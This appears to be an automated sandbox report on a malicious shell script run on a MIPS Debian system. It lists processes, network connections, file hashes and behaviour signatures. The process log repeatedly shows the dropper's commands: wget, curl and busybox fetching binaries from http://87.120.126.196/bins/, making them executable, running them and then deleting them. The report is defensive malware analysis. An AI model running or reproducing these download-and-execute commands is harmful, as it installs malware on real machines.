File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A

Processes

/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh

[/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/wget

[wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

[wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/wget

[wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 01:20

Reported

2024-10-21 01:22

Platform

debian9-mipsel-20240729-en

Max time kernel

74s

Max time network

75s

Command Line

[/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
